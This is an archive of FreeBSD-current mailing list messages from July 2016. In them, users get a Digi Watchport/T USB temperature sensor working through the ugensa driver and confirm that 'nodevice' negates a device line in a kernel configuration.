From owner-freebsd-current@freebsd.org Sun Jul 24 06:03:01 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 45683BA1B23; Sun, 24 Jul 2016 06:03:01 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from outpost1.zedat.fu-berlin.de (outpost1.zedat.fu-berlin.de [130.133.4.66]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id EAD4518AF; Sun, 24 Jul 2016 06:03:00 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from inpost2.zedat.fu-berlin.de ([130.133.4.69]) by outpost.zedat.fu-berlin.de (Exim 4.85) with esmtps (TLSv1.2:DHE-RSA-AES256-GCM-SHA384:256) (envelope-from ) id <1bRCV7-0031YY-Jw>; Sun, 24 Jul 2016 08:02:57 +0200 Received: from x4e34a127.dyn.telefonica.de ([78.52.161.39] helo=thor.walstatt.dynvpn.de) by inpost2.zedat.fu-berlin.de (Exim 4.85) with esmtpsa (TLSv1.2:AES256-GCM-SHA384:256) (envelope-from ) id <1bRCV7-003pps-A7>; Sun, 24 Jul 2016 08:02:57 +0200 Date: Sun, 24 Jul 2016 08:03:30 +0200 From: "O. Hartmann" To: Ian Lepore Cc: freebsd-usb@freebsd.org, FreeBSD CURRENT Subject: Re: Digi Watchport/T temperature sensor as /dev/ttyU Message-ID: <20160724080330.3a27e875.ohartman@zedat.fu-berlin.de> In-Reply-To: <1469306951.84197.31.camel@freebsd.org> References: <20160722183556.2fc39fd7.ohartman@zedat.fu-berlin.de> <1469206374.84197.14.camel@freebsd.org> <20160723220430.34ce02fe.ohartman@zedat.fu-berlin.de> <1469306951.84197.31.camel@freebsd.org> Organization: FU Berlin X-Mailer: Claws Mail 3.13.2 (GTK+ 2.24.29; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; boundary="Sig_/M8+Szzb3PB+HgSWCrY8ureM"; protocol="application/pgp-signature" X-Originating-IP: 78.52.161.39 X-ZEDAT-Hint: A X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 06:03:01 -0000 --Sig_/M8+Szzb3PB+HgSWCrY8ureM Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable Am Sat, 23 Jul 2016 14:49:11 -0600 Ian Lepore schrieb: > On Sat, 2016-07-23 at 22:04 +0200, O. Hartmann wrote: > > Am Fri, 22 Jul 2016 10:52:54 -0600 > > Ian Lepore schrieb: > > =20 > > > On Fri, 2016-07-22 at 18:35 +0200, O. Hartmann wrote: =20 > > > > For temperature monitoring, we have a bunch of Digi Watchport/T > > > > sensors:=20 > > > >=20 > > > > http://ftp1.digi.com/support/documentation/90000406_H.pdf > > > >=20 > > > > =20 > > > [...] > > >=20 > > > I think the attached patch will make it show up as a ttyU*/cuaU* > > > device > > > for you. (You should probably use the /dev/cuaU* flavor, to avoid > > > problems with tty layer and modem control signals). > > >=20 > > > I keep wishing we had a mechanism, like a sysctl that could be set > > > or > > > something, that would let you supply a vendor/product pair and have > > > the > > > ugensa driver attach to that device, for quick testing of this sort > > > of > > > thing. > > >=20 > > > -- Ian =20 > >=20 > > No, it doesn't change anything. I applied the patch to most recent > > CURRENT and it is > > still the same. But thanks anyway. > >=20 > > Kind regards, > >=20 > > oh =20 >=20 > Oh, my bad, I forgot to mention: You'll have to manually "kldload > ugensa" before plugging in the device (or load it from your > loader.conf). >=20 > When the change gets committed (assuming it works), the devd usb > scripts will get regenerated, and that's what handles the auto-load of > the driver. >=20 > -- Ian man ugensa doesn't exist! As I wrote earlier, I tried everything to load wh= at I could find. It seems, the patch and the hint about ugensa.ko did the magic ;-) Th= ank you very much! Could the patch be made permanent to FreeBSD CURRENT? And also important: where is the man page for ugensa? Can the the module be= compiled staitcally into the kernel or are there pitfalls? root@localhost: [src] kldload ugensa ugen2.7: at usbus2 ugensa0: on usbus2 ugensa0: Found 1 interfaces. root@thor: [src] man ugensa No manual entry for ugensa root@localhost: [src] ll /dev/cuaU0* 203 crw-rw---- 1 uucp dialer - 0xcb Jul 24 07:51 /dev/cuaU0 204 crw-rw---- 1 uucp dialer - 0xcc Jul 24 07:51 /dev/cuaU0.init 205 crw-rw---- 1 uucp dialer - 0xcd Jul 24 07:51 /dev/cuaU0.lock I'll try now to get informations out of the device, I let you know whether = that is a success. But anyway, again, thank you for helping making the device visible= and available. Kind regards, Oliver Hartmann --Sig_/M8+Szzb3PB+HgSWCrY8ureM Content-Type: application/pgp-signature Content-Description: OpenPGP digital signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXlFoyAAoJEOgBcD7A/5N8WFUIAIKyWVMR1pEbcuu8IhGv1daI kieLrwDZpRrCJpjpb4tsL11vyv7Zuexd8UMfSNwsRLW3VeFjJFbLn/gAqvgkU2Li 6QMAyTbezqkkhHjem6po68/21dY57St3TwvkMvi5Ix1etQq/qRzh/fCULWJMd72x K0avAM/RO6qUfr35Ph2KXpas9DiwkRgHLYuoYrnuR0MPvOMhlruw4wAR1tj9wqf8 ZWHCdlZzWmEcrlEzJAg0Y7GGW23Db6C1eOqeyRhBAYnZf3Glghk3G6Mf+7fP4c9B FwSYA/LFewoAQNOAVe+JaF102NPNlI7BxmiefsbACbZnYANumiIfxwf0W9lzPDI= =j5TN -----END PGP SIGNATURE----- --Sig_/M8+Szzb3PB+HgSWCrY8ureM-- From owner-freebsd-current@freebsd.org Sun Jul 24 06:39:14 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 2B5C5B9B315; Sun, 24 Jul 2016 06:39:14 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: from mail-wm0-x242.google.com (mail-wm0-x242.google.com [IPv6:2a00:1450:400c:c09::242]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id BD496160C; Sun, 24 Jul 2016 06:39:13 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: by mail-wm0-x242.google.com with SMTP id o80so11943818wme.0; Sat, 23 Jul 2016 23:39:13 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:in-reply-to:references:reply-to :mime-version:content-transfer-encoding; bh=q9Q4lxK5Y2igg3d+ljNIhZkcmRJ48SvmbdxPZqSJibg=; b=Qf4mpQ36rQEuKfXtccpqhIGrOEQccDCUwl4cgcaiqW52TsAzCWj+dzCnNXTvVqUwBL QqQPWEJzsfn3SckwDHUB3zVr0PdWPE6TYiCNg8nxl8dW71kh++E0h2EExKGMBFNS6lG2 fCkrpr7jnARkkwNfCt013Ss1QW0YvnpzJQCTtNgRWRCB5DKzo923uO59gEJbCP1lsEl2 N8YlqgBXh/ERS0jvhgqpmTNA0Nh12hJXf9mBEA/eHa2v8SlAcgXupmfP6bgWqKHIK125 7iLgUA37TJiggwm8G0CLM2rT89wjOBdwNG0kM8WgK6hinsywyYQJVpo3M9fvTNijjlo2 K1sw== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:in-reply-to :references:reply-to:mime-version:content-transfer-encoding; bh=q9Q4lxK5Y2igg3d+ljNIhZkcmRJ48SvmbdxPZqSJibg=; b=LS3egDcrseL2NLFw+gG8YpcqvX5z6ZG6Ng9MARPmEQNFa6pWSiqvOo7SOjTR0U612K uvVmE0AaHjvSetKNQYeWaQ6Woa25q/e5nz59UHr0/RfibwPxFpTSjkaCJIcwGmWA7QhO tOJ0xseRrut7YLeeas73XW6F3ByAatWhGteVrQOKlg368rle6BKh1UWcZpM/su9XoQnc vdsVaLmYQO801pNS4+WVln+8vbMkn3PkzBjl1XMwWOt6HveEJQkMh8Ap23BiJwesdtik ZqZB5chkDxuj1QK5QXBklpl5uSWqiHjDBQTghbrrbJeR2Dy8w99OHf9Vif1ddCQEJisB 7vrg== X-Gm-Message-State: AEkoous0y7RYGf3vaMQaE8lhExYJ+kdJgV/fQUONMOcl7n7Rq6vM6HC8O5WH8oFN+jFAag== X-Received: by 10.28.157.148 with SMTP id g142mr14772226wme.2.1469342351317; Sat, 23 Jul 2016 23:39:11 -0700 (PDT) Received: from ernst.home (p578E0FCF.dip0.t-ipconnect.de. [87.142.15.207]) by smtp.gmail.com with ESMTPSA id r67sm20871011wmb.14.2016.07.23.23.39.09 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Sat, 23 Jul 2016 23:39:10 -0700 (PDT) Date: Sun, 24 Jul 2016 08:38:59 +0200 From: Gary Jennejohn To: "O. Hartmann" Cc: Ian Lepore , freebsd-usb@freebsd.org, FreeBSD CURRENT Subject: Re: Digi Watchport/T temperature sensor as /dev/ttyU Message-ID: <20160724083859.4c0dd392@ernst.home> In-Reply-To: <20160724080330.3a27e875.ohartman@zedat.fu-berlin.de> References: <20160722183556.2fc39fd7.ohartman@zedat.fu-berlin.de> <1469206374.84197.14.camel@freebsd.org> <20160723220430.34ce02fe.ohartman@zedat.fu-berlin.de> <1469306951.84197.31.camel@freebsd.org> <20160724080330.3a27e875.ohartman@zedat.fu-berlin.de> Reply-To: gljennjohn@gmail.com X-Mailer: Claws Mail 3.13.2 (GTK+ 2.24.29; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 06:39:14 -0000 On Sun, 24 Jul 2016 08:03:30 +0200 "O. Hartmann" wrote: > Am Sat, 23 Jul 2016 14:49:11 -0600 > Ian Lepore schrieb: > > > On Sat, 2016-07-23 at 22:04 +0200, O. Hartmann wrote: > > > Am Fri, 22 Jul 2016 10:52:54 -0600 > > > Ian Lepore schrieb: > > > > > > > On Fri, 2016-07-22 at 18:35 +0200, O. Hartmann wrote: > > > > > For temperature monitoring, we have a bunch of Digi Watchport/T > > > > > sensors: > > > > > > > > > > http://ftp1.digi.com/support/documentation/90000406_H.pdf > > > > > > > > > > > > > > [...] > > > > > > > > I think the attached patch will make it show up as a ttyU*/cuaU* > > > > device > > > > for you. (You should probably use the /dev/cuaU* flavor, to avoid > > > > problems with tty layer and modem control signals). > > > > > > > > I keep wishing we had a mechanism, like a sysctl that could be set > > > > or > > > > something, that would let you supply a vendor/product pair and have > > > > the > > > > ugensa driver attach to that device, for quick testing of this sort > > > > of > > > > thing. > > > > > > > > -- Ian > > > > > > No, it doesn't change anything. I applied the patch to most recent > > > CURRENT and it is > > > still the same. But thanks anyway. > > > > > > Kind regards, > > > > > > oh > > > > Oh, my bad, I forgot to mention: You'll have to manually "kldload > > ugensa" before plugging in the device (or load it from your > > loader.conf). > > > > When the change gets committed (assuming it works), the devd usb > > scripts will get regenerated, and that's what handles the auto-load of > > the driver. > > > > -- Ian > man ugensa doesn't exist! As I wrote earlier, I tried everything to load what I could > find. It seems, the patch and the hint about ugensa.ko did the magic ;-) Thank you very > much! Could the patch be made permanent to FreeBSD CURRENT? > > And also important: where is the man page for ugensa? Can the the module be compiled > staitcally into the kernel or are there pitfalls? > Even the most complete man page found in the internet, the one from Dragonfly, doesn't list your Digi International device as being one of those supported. Still, having the man page under FreeBSD would at least provide a hint that the driver even exists. I added device ugensa to my config file and the kernel was generated without an error. > root@localhost: [src] kldload ugensa > > ugen2.7: at usbus2 > ugensa0: on usbus2 > ugensa0: Found 1 interfaces. > root@thor: [src] man ugensa > No manual entry for ugensa > root@localhost: [src] ll /dev/cuaU0* > 203 crw-rw---- 1 uucp dialer - 0xcb Jul 24 07:51 /dev/cuaU0 > 204 crw-rw---- 1 uucp dialer - 0xcc Jul 24 07:51 /dev/cuaU0.init > 205 crw-rw---- 1 uucp dialer - 0xcd Jul 24 07:51 /dev/cuaU0.lock > > > I'll try now to get informations out of the device, I let you know whether that is a > success. But anyway, again, thank you for helping making the device visible and available. > -- Gary Jennejohn From owner-freebsd-current@freebsd.org Sun Jul 24 08:51:03 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id A1515BA3427; Sun, 24 Jul 2016 08:51:03 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from outpost1.zedat.fu-berlin.de (outpost1.zedat.fu-berlin.de [130.133.4.66]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 6086B15F8; Sun, 24 Jul 2016 08:51:03 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from inpost2.zedat.fu-berlin.de ([130.133.4.69]) by outpost.zedat.fu-berlin.de (Exim 4.85) with esmtps (TLSv1.2:DHE-RSA-AES256-GCM-SHA384:256) (envelope-from ) id <1bRF7l-003VgV-Cf>; Sun, 24 Jul 2016 10:51:01 +0200 Received: from x4e34a127.dyn.telefonica.de ([78.52.161.39] helo=thor.walstatt.dynvpn.de) by inpost2.zedat.fu-berlin.de (Exim 4.85) with esmtpsa (TLSv1.2:AES256-GCM-SHA384:256) (envelope-from ) id <1bRF7l-004161-3c>; Sun, 24 Jul 2016 10:51:01 +0200 Date: Sun, 24 Jul 2016 10:51:34 +0200 From: "O. Hartmann" To: Gary Jennejohn Cc: Ian Lepore , freebsd-usb@freebsd.org, FreeBSD CURRENT Subject: Re: Digi Watchport/T temperature sensor as /dev/ttyU Message-ID: <20160724105134.184f0b7f.ohartman@zedat.fu-berlin.de> In-Reply-To: <20160724083859.4c0dd392@ernst.home> References: <20160722183556.2fc39fd7.ohartman@zedat.fu-berlin.de> <1469206374.84197.14.camel@freebsd.org> <20160723220430.34ce02fe.ohartman@zedat.fu-berlin.de> <1469306951.84197.31.camel@freebsd.org> <20160724080330.3a27e875.ohartman@zedat.fu-berlin.de> <20160724083859.4c0dd392@ernst.home> Organization: FU Berlin X-Mailer: Claws Mail 3.13.2 (GTK+ 2.24.29; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; boundary="Sig_/o/t_pXrOJINiBb9lbfwGo_J"; protocol="application/pgp-signature" X-Originating-IP: 78.52.161.39 X-ZEDAT-Hint: A X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 08:51:03 -0000 --Sig_/o/t_pXrOJINiBb9lbfwGo_J Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable Am Sun, 24 Jul 2016 08:38:59 +0200 Gary Jennejohn schrieb: > On Sun, 24 Jul 2016 08:03:30 +0200 > "O. Hartmann" wrote: >=20 > > Am Sat, 23 Jul 2016 14:49:11 -0600 > > Ian Lepore schrieb: > > =20 > > > On Sat, 2016-07-23 at 22:04 +0200, O. Hartmann wrote: =20 > > > > Am Fri, 22 Jul 2016 10:52:54 -0600 > > > > Ian Lepore schrieb: > > > > =20 > > > > > On Fri, 2016-07-22 at 18:35 +0200, O. Hartmann wrote: =20 > > > > > > For temperature monitoring, we have a bunch of Digi Watchport/T > > > > > > sensors:=20 > > > > > >=20 > > > > > > http://ftp1.digi.com/support/documentation/90000406_H.pdf > > > > > >=20 > > > > > > =20 > > > > > [...] > > > > >=20 > > > > > I think the attached patch will make it show up as a ttyU*/cuaU* > > > > > device > > > > > for you. (You should probably use the /dev/cuaU* flavor, to avoid > > > > > problems with tty layer and modem control signals). > > > > >=20 > > > > > I keep wishing we had a mechanism, like a sysctl that could be set > > > > > or > > > > > something, that would let you supply a vendor/product pair and ha= ve > > > > > the > > > > > ugensa driver attach to that device, for quick testing of this so= rt > > > > > of > > > > > thing. > > > > >=20 > > > > > -- Ian =20 > > > >=20 > > > > No, it doesn't change anything. I applied the patch to most recent > > > > CURRENT and it is > > > > still the same. But thanks anyway. > > > >=20 > > > > Kind regards, > > > >=20 > > > > oh =20 > > >=20 > > > Oh, my bad, I forgot to mention: You'll have to manually "kldload > > > ugensa" before plugging in the device (or load it from your > > > loader.conf). > > >=20 > > > When the change gets committed (assuming it works), the devd usb > > > scripts will get regenerated, and that's what handles the auto-load of > > > the driver. > > >=20 > > > -- Ian =20 > > man ugensa doesn't exist! As I wrote earlier, I tried everything to loa= d what I could > > find. It seems, the patch and the hint about ugensa.ko did the magic ;-= ) Thank you > > very much! Could the patch be made permanent to FreeBSD CURRENT? > >=20 > > And also important: where is the man page for ugensa? Can the the modul= e be compiled > > staitcally into the kernel or are there pitfalls? > > =20 >=20 > Even the most complete man page found in the internet, the one from > Dragonfly, doesn't list your Digi International device as being one > of those supported. Yes. That is a pity. But Linux seems to operate this serial device. I have = to check next time I get hands on a Linux box, what driver is attached to the sensor. >=20 > Still, having the man page under FreeBSD would at least provide a hint > that the driver even exists. Agreed. >=20 > I added device ugensa to my config file and the kernel was generated > without an error. Me, too. >=20 > > root@localhost: [src] kldload ugensa > >=20 > > ugen2.7: at usbus2 > > ugensa0: on usbu= s2 > > ugensa0: Found 1 interfaces. > > root@thor: [src] man ugensa > > No manual entry for ugensa > > root@localhost: [src] ll /dev/cuaU0* > > 203 crw-rw---- 1 uucp dialer - 0xcb Jul 24 07:51 /dev/cuaU0 > > 204 crw-rw---- 1 uucp dialer - 0xcc Jul 24 07:51 /dev/cuaU0.init > > 205 crw-rw---- 1 uucp dialer - 0xcd Jul 24 07:51 /dev/cuaU0.lock > >=20 > >=20 > > I'll try now to get informations out of the device, I let you know whet= her that is a > > success. But anyway, again, thank you for helping making the device vis= ible and > > available.=20 >=20 I had no luck with retrieving informations out of the device by the Perl5 s= cript provided by Nagios.org. A prerequisite for the Perl script is the FreeBSD port comms/p5-Device-SerialPort Patching the script is trivial, but I do not know whether the backend, comms/p5-Device-SerialPort, works a sexpected. So the first, dirty, trial e= nded up in nothing - since the information gained from the sensor is an empty string/n= othing. I'm not familiar with serial devices, so far, so probably there is somethin= g trivial missing. --Sig_/o/t_pXrOJINiBb9lbfwGo_J Content-Type: application/pgp-signature Content-Description: OpenPGP digital signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXlIGWAAoJEOgBcD7A/5N8CmoH/jUYDAovA8em7YRtAs64/QDV FdApj+GEjpeMfQIRbsFrqu65U5thA5stFYRCRNrRY1cbiocjm3hiYBw3yscGPhxy tZec1bmb9CLQ1GeRuZTd0cGVujPeEFOqRzr819ghupWcPhqK7MFEoaL4JJkewv8Q GNizxOnCiq5g2uHe0Q3QGUDR5GD9WCwpnXOaRRd/RoAceE1EIgFHmtlZiG6k9LKS 7BVIN3DgTq07t//P5sw3jnMKpQr0AD/EjewiZ2cc7GV1vy4tegGNFaWADp7ehhBl SlLxCyMyShoTFfLuDd51GaMF/0D6EHHeElwPU+hOR1/2EeRp5aUx25HyXdAqVec= =12BX -----END PGP SIGNATURE----- --Sig_/o/t_pXrOJINiBb9lbfwGo_J-- From owner-freebsd-current@freebsd.org Sun Jul 24 08:51:59 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 3DE54BA35C4 for ; Sun, 24 Jul 2016 08:51:59 +0000 (UTC) (envelope-from tech-lists@zyxst.net) Received: from out5-smtp.messagingengine.com (out5-smtp.messagingengine.com [66.111.4.29]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 174B61803 for ; Sun, 24 Jul 2016 08:51:58 +0000 (UTC) (envelope-from tech-lists@zyxst.net) Received: from compute6.internal (compute6.nyi.internal [10.202.2.46]) by mailout.nyi.internal (Postfix) with ESMTP id C55C3202A1 for ; Sun, 24 Jul 2016 04:51:57 -0400 (EDT) Received: from frontend2 ([10.202.2.161]) by compute6.internal (MEProxy); Sun, 24 Jul 2016 04:51:57 -0400 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d=zyxst.net; h= content-transfer-encoding:content-type:date:from:message-id :mime-version:subject:to:x-sasl-enc:x-sasl-enc; s=mesmtp; bh=0MX NDWVU48ksdDfoy/rvXx5pHQY=; b=tE6UxV/r/49kNrNWoCExM1Ga4ODlmC629VE Evb876yqfiaEtLRkE6NieUU6o7TYyzW5aTSUd2soD4gX4S/5vEZHPt+u1WGOWYEE VLXNosnDhpSN9aSQnyH2mKRikim78szi00Rw2yutIQvIpJAX826rBAh70OOxYs4s UVE8cFjY= DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d= messagingengine.com; h=content-transfer-encoding:content-type :date:from:message-id:mime-version:subject:to:x-sasl-enc :x-sasl-enc; s=smtpout; bh=0MXNDWVU48ksdDfoy/rvXx5pHQY=; b=rTrWx zbHBPOke5wdJXqPNmfRzocmB5qeFxGVLu9T3hTJY+KZ2e7pf+VFZOQVFLsYogZ4v X6m/rQnOhB+S9QtDEXhhfBNvkUmQAItTAy74JaxzgQaD+ou5DqCuwa64EGONHY8R m+Vd5R/2MdPg0tjX/kTs7EoImhS6Ki5zT78lp4= X-Sasl-enc: sZjnHWrBItdUS78LkY3NaQMQ4RwsoxMsP7KaWdnVdL4c 1469350317 Received: from pumpkin.growveg.org (potato.growveg.org [82.70.91.102]) by mail.messagingengine.com (Postfix) with ESMTPA id 6996BCCDAC for ; Sun, 24 Jul 2016 04:51:57 -0400 (EDT) To: freebsd-current@freebsd.org From: tech-lists Subject: kernel options X-Enigmail-Draft-Status: N1110 Message-ID: Date: Sun, 24 Jul 2016 09:51:46 +0100 User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 8bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 08:51:59 -0000 Hi, In -HEAD there is a generic kernel GENERIC-NODEBUG. The syntax of OPTIONS appears to be NOOPTIONS. Is there an inverse for DEVICE ? For example, there is a line device fdc in GENERIC. Would NODEVICE negate it? I didn't see anything in NOTES to confirm. thanks, -- J. From owner-freebsd-current@freebsd.org Sun Jul 24 09:51:00 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 0756EB9B52C for ; Sun, 24 Jul 2016 09:51:00 +0000 (UTC) (envelope-from yaneurabeya@gmail.com) Received: from mail-pf0-x22a.google.com (mail-pf0-x22a.google.com [IPv6:2607:f8b0:400e:c00::22a]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id C979D195D for ; Sun, 24 Jul 2016 09:50:59 +0000 (UTC) (envelope-from yaneurabeya@gmail.com) Received: by mail-pf0-x22a.google.com with SMTP id p64so54560546pfb.1 for ; Sun, 24 Jul 2016 02:50:59 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=subject:mime-version:from:in-reply-to:date:cc:message-id:references :to; bh=Yw1jvbpinuZtMdXi9OMPtMoxeHd11tc6+KhaxD0AZeQ=; b=iUGm60RotFCv2yvsFaNMNXqj+A5+HM6pewL77qYU/Ct4hHy5cRyIj8z9ns++zbdnpq 5V99kJNPAqOqlKxOrlieMGiEQgym1KSQ9GgpY6/2UvJKNLl/J8uvfT1hQMfxhF5tAo7o 31ni+4xayZBFVJGZyOXdvuop3djulNVzIw+QlgHKccrcUvpHI64v0iq6p9xdzNawqShX qd0ViNE9xQ1SIMjsIrdbw5HWm7Dv8IQlGbqtKDnTDfZGx8F7JJlNILrhtN88PuLJ1ymI aWtZ3BtXsojZzVCqiYlgMFPmpo6X9tqnXWiZdc0ZTU+fY5QISuDPIilnDjeHvpHNwpUg sc0g== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:subject:mime-version:from:in-reply-to:date:cc :message-id:references:to; bh=Yw1jvbpinuZtMdXi9OMPtMoxeHd11tc6+KhaxD0AZeQ=; b=R0cg5w69FRHC90kq4elKFz5I3uJ14NPGN7sLrLvlWm16M0NISCQXBo96prmnqctWk0 MX3HnpBzVP7DttELV40Yq7hIiUSBdljhoPK4METzDdqJok3gSxppb/wxb8ED0SwCGf+i NOm6XrZfgXQLy7gr01XeWj7fENfUZJW2jBeV2+Oq+EBc5k5LGAbzynlKh49lExklViic q9SCcRhfGOst+U6BCr5Rlc0N5svVBOIkL2zdjELkdMKAdlr3OjbnTaUV20rtK5aslwmp NddSmlNuy8qBz94D0HgIFkCe8WkBWYk/+UXnzEZARpS/vayNScq33S2SJETMD/kXjRGY WfNw== X-Gm-Message-State: AEkoouv6vUoydZVx+cgLZqBFQ/M47ZqVASJh0OCPFprTnVuQYI31LJbZ2yw21BDiad6RQQ== X-Received: by 10.98.6.132 with SMTP id 126mr20633911pfg.109.1469353859351; Sun, 24 Jul 2016 02:50:59 -0700 (PDT) Received: from [192.168.20.9] (c-73-19-52-228.hsd1.wa.comcast.net. [73.19.52.228]) by smtp.gmail.com with ESMTPSA id q26sm31850333pfj.53.2016.07.24.02.50.58 (version=TLS1 cipher=ECDHE-RSA-AES128-SHA bits=128/128); Sun, 24 Jul 2016 02:50:58 -0700 (PDT) Subject: Re: kernel options Mime-Version: 1.0 (Mac OS X Mail 9.3 \(3124\)) Content-Type: multipart/signed; boundary="Apple-Mail=_5E843AA8-9210-43E8-B606-6925AE31C7BF"; protocol="application/pgp-signature"; micalg=pgp-sha512 X-Pgp-Agent: GPGMail From: "Ngie Cooper (yaneurabeya)" In-Reply-To: Date: Sun, 24 Jul 2016 02:50:56 -0700 Cc: freebsd-current@freebsd.org Message-Id: References: To: tech-lists X-Mailer: Apple Mail (2.3124) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 09:51:00 -0000 --Apple-Mail=_5E843AA8-9210-43E8-B606-6925AE31C7BF Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii > On Jul 24, 2016, at 01:51, tech-lists wrote: > > Hi, > > In -HEAD there is a generic kernel GENERIC-NODEBUG. The syntax of > OPTIONS appears to be NOOPTIONS. Is there an inverse for DEVICE ? > > For example, there is a line > > device fdc > > in GENERIC. Would NODEVICE negate it? > > I didn't see anything in NOTES to confirm. `nodevice` works. See `man 5 config` for more details. Cheers, -Ngie --Apple-Mail=_5E843AA8-9210-43E8-B606-6925AE31C7BF Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=signature.asc Content-Type: application/pgp-signature; name=signature.asc Content-Description: Message signed with OpenPGP using GPGMail -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJXlI+BAAoJEPWDqSZpMIYVvzcQAIsvKAinE5YDbznp01C58PHr p7Szs1UflZRFD+2iZMrsqOPMYyJWcpF7Ci2OxJK0R75GrFPrxm1HmyMkcDwOOhZO VLk4vUReplFfKjW9gqF1qBmUSn3QqITP5AZudBQ1UI5642G57/4Qe4o46S64hN6m tYFR/TUu46Jz273NlJjdoHzySTF+g2UfhuIfgGUwa3epcNpQhiOKUhdplKVnY3EH yjh8trmqHH8N4RbM7T5EtxQludL03t3J38blK8/Jsyigot4BL4/otrzQ0kwPxeMY DN4HxyYlK0MJKY97T9dFGuAXTaFmpQh1AXQlKS1flf1bb3QvAGUxjXuygmuzhfpe HLTz5ySB4sqV/B/G5glMkuE1+qMMZhk3hpQ7PpZ8892wjoQc00pEmDNk9DLtVTLm XIkM9xqERdGOdE00liBxUGFXCnyzoNXGc9+Z8la3PLZok3xKmJh3Rr8nvbeLMbIq dGb7IMVFaO2JTUcMKECIC4nHP0fQMoEwWGpkp4T1upPd8Y6B3PUq4+UVX1nRIfUy 